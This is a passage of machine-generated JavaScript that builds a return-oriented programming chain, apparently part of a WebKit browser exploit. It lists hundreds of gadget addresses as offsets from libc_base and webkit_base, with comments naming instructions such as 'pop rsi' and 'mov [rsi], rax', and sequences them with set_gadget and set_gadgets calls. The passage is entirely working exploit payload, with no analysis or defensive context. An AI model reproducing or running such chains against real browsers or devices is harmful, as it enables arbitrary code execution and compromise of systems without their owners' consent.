//L941: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L942: db([16, 0]); // 0x10 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+102552, //L943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+102568, //L944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L943: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+102656, //L946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+102712, //L947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+102784, //L950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L950: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+102840, //L951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L951: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L953: 
libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+102976, //L954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L956: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+103096, //L959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+103080, //L957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L957: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L959: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+103240, //L962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+103208, //L960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+103224, //L961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L960: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L961: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L962: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+103312, //L964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L964: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+103368, //L965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L965: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+103464, //L968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L967: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L969: db([17, 0]); // 0x11 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+103560, //L970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+103576, //L971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L970: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L971: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+103664, //L973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L973: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+103720, //L974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L974: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+103792, //L977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L977: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+103848, //L978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L978: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L980: libc_base+764760, //pop rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+103984, //L981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L981: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L983: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+104104, //L986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+104088, //L984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L984: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L986: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+104248, //L989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+104216, //L987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+104232, //L988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L987: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L989: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+104320, //L991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L991: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+104376, //L992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L992: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+104472, //L995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L994: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L995: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L996: db([18, 0]); // 0x12 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+104568, //L997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+104584, //L998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L998: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+104672, //L1000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1000: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+104728, //L1001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L1001: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+104800, //L1004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1004: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+104856, //L1005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1005: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+104944, //L1007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1007: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1009: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+105064, //L1012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+105048, //L1010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1010: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1012: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+105208, //L1015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+105176, //L1013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+105192, //L1014 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+763368 //pop rcx ]); //L1013: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1015: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+105280, //L1017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1017: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+105336, //L1018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1018: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+105432, //L1021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1020: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1022: db([3, 0]); // 0x3 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+105528, //L1023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+105544, //L1024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1023: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1024: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+105632, //L1026 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1026: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+105688, //L1027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1027: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+105792, //L1029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1029: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1031: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+105912, //L1034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+105896, //L1032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1032: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1034: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+106056, //L1037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+106024, //L1035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+106040, //L1036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1035: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1036: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1037: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+106128, //L1039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1039: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+106184, //L1040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1040: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+106280, //L1043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1042: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1043: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1044: db([19, 0]); // 0x13 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+106376, //L1045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+106392, //L1046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1045: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1046: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+106480, //L1048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1048: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+106536, //L1049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1049: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+106608, //L1052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1052: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+106664, //L1053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1053: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1055: webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+106800, //L1056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1056: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1058: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+106920, //L1061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+106904, //L1059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1061: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+107064, //L1064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+107032, //L1062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+107048, //L1063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1062: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1063: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1064: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+107136, //L1066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1066: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+107192, //L1067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1067: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+107288, //L1070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1069: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1070: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1071: db([20, 0]); // 0x14 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+107384, //L1072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+107400, //L1073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1072: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1073: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi 
]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+107488, //L1075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1075: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+107544, //L1076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1076: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+107616, //L1079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1079: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+107672, //L1080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1080: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1082: libc_base+763368, //pop rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+107808, //L1083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1083: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1085: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+107928, //L1088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+107912, //L1086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1086: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1088: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+108072, //L1091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+108040, //L1089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+108056, //L1090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1091: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+108144, //L1093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1093: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+108200, //L1094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1094: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+108296, //L1097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1096: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1097: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1098: db([21, 0]); // 0x15 set_gadgets([ 
webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+108392, //L1099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+108408, //L1100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1099: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1100: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+108496, //L1102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1102: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+108552, //L1103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1103: db([0, 0]); // 0x0 